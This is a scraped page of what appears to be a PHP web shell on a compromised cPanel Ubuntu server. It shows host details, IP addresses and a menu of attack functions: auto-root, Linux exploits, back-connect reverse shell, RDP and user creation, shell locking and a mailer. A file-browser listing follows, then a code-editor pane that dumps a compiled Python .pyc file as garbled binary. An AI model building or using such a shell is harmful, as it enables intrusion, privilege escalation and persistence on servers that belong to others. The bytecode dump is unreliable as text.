Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.156
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
xml /
dom /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
NodeFilter.cpython-310.pyc
968
B
-rw-r--r--
__init__.cpython-310.pyc
5.15
KB
-rw-r--r--
domreg.cpython-310.pyc
2.79
KB
-rw-r--r--
expatbuilder.cpython-310.pyc
26.67
KB
-rw-r--r--
minicompat.cpython-310.pyc
2.63
KB
-rw-r--r--
minidom.cpython-310.pyc
54.03
KB
-rw-r--r--
pulldom.cpython-310.pyc
10.31
KB
-rw-r--r--
xmlbuilder.cpython-310.pyc
12.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.cpython-310.pyc
o }�5h� � @ s� d Z G dd� d�ZdZdZdZdZdZdZd Zd Z dZ dZd ZdZ dZdZdZdZG dd� de�ZG dd� de�ZG dd� de�ZG dd� de�ZG dd� de�ZG dd� de�ZG dd � d e�ZG d!d"� d"e�ZG d#d$� d$e�ZG d%d&� d&e�ZG d'd(� d(e�ZG d)d*� d*e�ZG d+d,� d,e�ZG d-d.� d.e�Z G d/d0� d0e�Z!G d1d2� d2e�Z"G d3d4� d4e�Z#G d5d6� d6�Z$d7Z%d8Z&d9Z'd:Z(d:Z)dd;l*m+Z+m,Z, d:S )<a W3C Document Object Model implementation for Python. The Python mapping of the Document Object Model is documented in the Python Library Reference in the section on the xml.dom package. This package contains the following modules: minidom -- A simple implementation of the Level 1 DOM with namespace support added (based on the Level 2 specification) and other minor Level 2 functionality. pulldom -- DOM builder supporting on-demand tree-building for selected subtrees of the document. c @ sD e Zd ZdZdZdZdZdZdZdZ dZ d Zd ZdZ dZd ZdZdS )�Nodez$Class giving the NodeType constants.� � � � � � � � � � � � � N)�__name__� __module__�__qualname__�__doc__� __slots__�ELEMENT_NODE�ATTRIBUTE_NODE� TEXT_NODE�CDATA_SECTION_NODE�ENTITY_REFERENCE_NODE�ENTITY_NODE�PROCESSING_INSTRUCTION_NODE�COMMENT_NODE� DOCUMENT_NODE�DOCUMENT_TYPE_NODE�DOCUMENT_FRAGMENT_NODE� NOTATION_NODEr r r �'/usr/lib/python3.10/xml/dom/__init__.pyr s r r r r r r r r r r r r r � � � � c @ s e Zd ZdZdd� Zdd� ZdS )�DOMExceptionzmAbstract base class for DOM exceptions. Exceptions with specific codes are specializations of this class.c O s. | j tu r td��tj| g|�R i |�� d S )Nz0DOMException should not be instantiated directly)� __class__r% �RuntimeError� Exception�__init__)�self�args�kwr r r r) B s �zDOMException.__init__c C s | j S )N)�code)r* r r r � _get_codeH s zDOMException._get_codeN)r r r r r) r. r r r r r% >